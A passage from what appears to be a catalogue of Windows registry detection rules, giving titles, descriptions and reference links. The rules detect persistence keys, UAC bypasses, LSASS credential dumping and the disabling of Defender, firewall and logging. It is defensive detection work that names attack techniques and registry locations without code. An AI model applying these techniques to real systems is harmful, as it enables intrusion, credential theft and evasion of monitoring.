https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks, https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers |
New DLL Added to AppInit_DLLs Registry Key |
DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll |
https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html |
Office Application Startup - Office Test |
Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started |
https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ |
Windows Registry Trust Record Modification |
Alerts on trust record modification within the registry, indicating usage of macros |
https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/, http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html, https://twitter.com/inversecos/status/1494174785621819397 |
Registry Persistence Mechanisms in Recycle Bin |
Detects persistence registry keys for Recycle Bin |
https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf, https://persistence-info.github.io/Data/recyclebin.html, https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/ |
New PortProxy Registry Entry Added |
Detects the modification of the PortProxy registry key which is used for port forwarding. |
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html, https://adepts.of0x.cc/netsh-portproxy-code/, https://www.dfirnotes.net/portproxy_detection/ |
RedMimicry Winnti Playbook Registry Manipulation |
Detects actions caused by the RedMimicry Winnti playbook |
https://redmimicry.com |
WINEKEY Registry Modification |
Detects potential malicious modification of run keys by winekey or team9 backdoor |
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
Run Once Task Configuration in Registry |
Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup |
https://twitter.com/pabraeken/status/990717080805789697, https://lolbas-project.github.io/lolbas/Binaries/Runonce/ |
Shell Open Registry Keys Manipulation |
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) |
https://github.com/hfiref0x/UACME, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/, https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass, https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021] |
Security Support Provider (SSP) Added to LSA Configuration |
Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
|
https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157 |
Potential Credential Dumping Via LSASS SilentProcessExit Technique |
Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process |
https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/, https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ |
Sticky Key Like Backdoor Usage - Registry |
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen |
https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ |
Atbroker Registry Change |
Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' |
http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/, https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ |
Suspicious Run Key from Download |
Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories |
https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ |
DLL Load via LSASS |
Detects a method to load DLL via LSASS process using an undocumented Registry key |
https://blog.xpnsec.com/exploring-mimikatz-part-1/, https://twitter.com/SBousseaden/status/1183745981189427200 |
Suspicious Camera and Microphone Access |
Detects Processes accessing the camera and microphone from suspicious folder |
https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 |
Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback |
Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. |
https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista |
Registry Persistence via Service in Safe Mode |
Detects the modification of the registry to allow a driver or service to persist in Safe Mode. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network |
Add Port Monitor Persistence in Registry |
Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md |
Add Debugger Entry To AeDebug For Persistence |
Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes |
https://persistence-info.github.io/Data/aedebug.html, https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging |
Allow RDP Remote Assistance Feature |
Detect enable rdp feature to allow specific user to rdp connect on the targeted machine |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md |
Potential AMSI COM Server Hijacking |
Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless |
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/, https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass |
CurrentVersion Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ |
Common Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://persistence-info.github.io/Data/userinitmprlogonscript.html |
Classes Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
CurrentControlSet Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
CurrentVersion NT Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Internet Explorer Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Office Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Session Manager Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
System Scripts Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
WinSock2 Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Wow6432Node CurrentVersion Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ |
Wow6432Node Classes Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
New BgInfo.EXE Custom DB Path Registry Configuration |
Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. |
Internal Research |
Wow6432Node Windows NT CurrentVersion Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
New BgInfo.EXE Custom WMI Query Registry Configuration |
Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" |
Internal Research |
New BgInfo.EXE Custom VBScript Registry Configuration |
Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" |
Internal Research |
Bypass UAC Using Event Viewer |
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification |
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd |
Blackbyte Ransomware Registry |
BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption |
https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ |
Bypass UAC Using DelegateExecute |
Bypasses User Account Control using a fileless method |
https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand, https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute |
Bypass UAC Using SilentCleanup Task |
Detects the setting of the environement variable "windir" to a non default value.
Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task, https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/, https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign |
Default RDP Port Changed to Non Standard Port |
Detects changes to the default RDP port.
Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller |
IE Change Domain Zone |
Hides the file extension through modification of the registry |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries |
Sysmon Driver Altitude Change |
Detects changes in Sysmon driver altitude value.
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
|
https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650, https://youtu.be/zSihR3lTf7g |
Change Winevt Channel Access Permission Via Registry |
Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel. |
https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/, https://learn.microsoft.com/en-us/windows/win32/api/winevt/, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ |
Running Chrome VPN Extensions via the Registry 2 VPN Extension |
Running Chrome VPN Extensions via the Registry install 2 vpn extension |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension |
ClickOnce Trust Prompt Tampering |
Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5, https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior |
Potential CobaltStrike Service Installations - Registry |
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
|
https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395 |
COM Hijack via Sdclt |
Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute' |
http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass, https://www.exploit-db.com/exploits/47696 |
CrashControl CrashDump Disabled |
Detects disabling the CrashDump per registry (as used by HermeticWiper) |
https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/ |
Service Binary in Suspicious Folder |
Detect the creation of a service with a service binary located in a suspicious directory |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Custom File Open Handler Executes PowerShell |
Detects the abuse of custom file open handler, executing powershell |
https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728 |
Potential Registry Persistence Attempt Via DbgManagedDebugger |
Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes |
https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/, https://github.com/last-byte/PersistenceSniper |
Windows Defender Exclusions Added - Registry |
Detects the Setting of Windows Defender Exclusions |
https://twitter.com/_nullbind/status/1204923340810543109 |
Potentially Suspicious Desktop Background Change Via Registry |
Detects registry value settings that would replace the user's desktop background.
This is a common technique used by malware to change the desktop background to a ransom note or other image.
|
https://www.attackiq.com/2023/09/20/emulating-rhysida/, https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/, https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html, https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI |
Antivirus Filter Driver Disallowed On Dev Drive - Registry |
Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
|
https://twitter.com/0gtweet/status/1720419490519752955 |
Hypervisor Enforced Code Integrity Disabled |
Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
|
https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/, https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci |
Hypervisor Enforced Paging Translation Disabled |
Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
|
https://twitter.com/standa_t/status/1808868985678803222, https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf |
DHCP Callout DLL Installation |
Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) |
https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx |
Disable Exploit Guard Network Protection on Windows Defender |
Detects disabling Windows Defender Exploit Guard Network Protection |
https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html |
Disable Administrative Share Creation at Startup |
Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup |
Disabled Windows Defender Eventlog |
Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections |
https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2 |
Disable PUA Protection on Windows Defender |
Detects disabling Windows Defender PUA protection |
https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html |
Disable Tamper Protection on Windows Defender |
Detects disabling Windows Defender Tamper Protection |
https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html |
Potential AutoLogger Sessions Tampering |
Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging |
https://twitter.com/MichalKoczwara/status/1553634816016498688, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf |
Disable Microsoft Defender Firewall via Registry |
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry |
Disable Internal Tools or Feature in Registry |
Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md, https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions, https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage, https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl |
Disable Macro Runtime Scan Scope |
Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros |
https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/, https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope, https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba |
Disable Privacy Settings Experience in Registry |
Detects registry modifications that disable Privacy Settings Experience |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md |
Disable Windows Security Center Notifications |
Detect set UseActionCenterExperience to 0 to disable the Windows security center notification |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md |
Registry Disable System Restore |
Detects the modification of the registry to disable a system restore on the computer |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry |
Windows Defender Service Disabled - Registry |
Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry |
https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 |
Disable Windows Firewall by Registry |
Detect set EnableFirewall to 0 to disable the Windows firewall |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md |
Disable Windows Event Logging Via Registry |
Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel |
https://twitter.com/WhichbufferArda/status/1543900539280293889, https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp |
Add DisallowRun Execution to Registry |
Detect set DisallowRun to 1 to prevent user running specific computer program |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md |
Persistence Via Disk Cleanup Handler - Autorun |
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
The disk cleanup manager is part of the operating system.
It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
|
https://persistence-info.github.io/Data/diskcleanuphandler.html, https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ |
DNS-over-HTTPS Enabled by Registry |
Detects when a user enables DNS-over-HTTPS.
This can be used to hide internet activity or be used to hide the process of exfiltrating data.
With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
|
https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html, https://github.com/elastic/detection-rules/issues/1371, https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode, https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS |
New DNS ServerLevelPluginDll Installed |
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) |
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html |
ETW Logging Disabled In .NET Processes - Sysmon Registry |
Potential adversaries stopping ETW providers recording loaded .NET assemblies. |
https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf |
Directory Service Restore Mode(DSRM) Registry Value Tampering |
Detects changes to "DsrmAdminLogonBehavior" registry value.
During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.
If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
|
https://adsecurity.org/?p=1785, https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/, https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials |
Periodic Backup For System Registry Hives Enabled |
Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups.
Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
|
https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder |
Windows Recall Feature Enabled - Registry |
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
|
https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis |
Enabling COR Profiler Environment Variables |
Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. |
https://twitter.com/jamieantisocial/status/1304520651248668673, https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors, https://www.sans.org/cyber-security-summit/archives, https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling |
Potential EventLog File Location Tampering |
Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting |
https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key |
Scripted Diagnostics Turn Off Check Enabled - Registry |
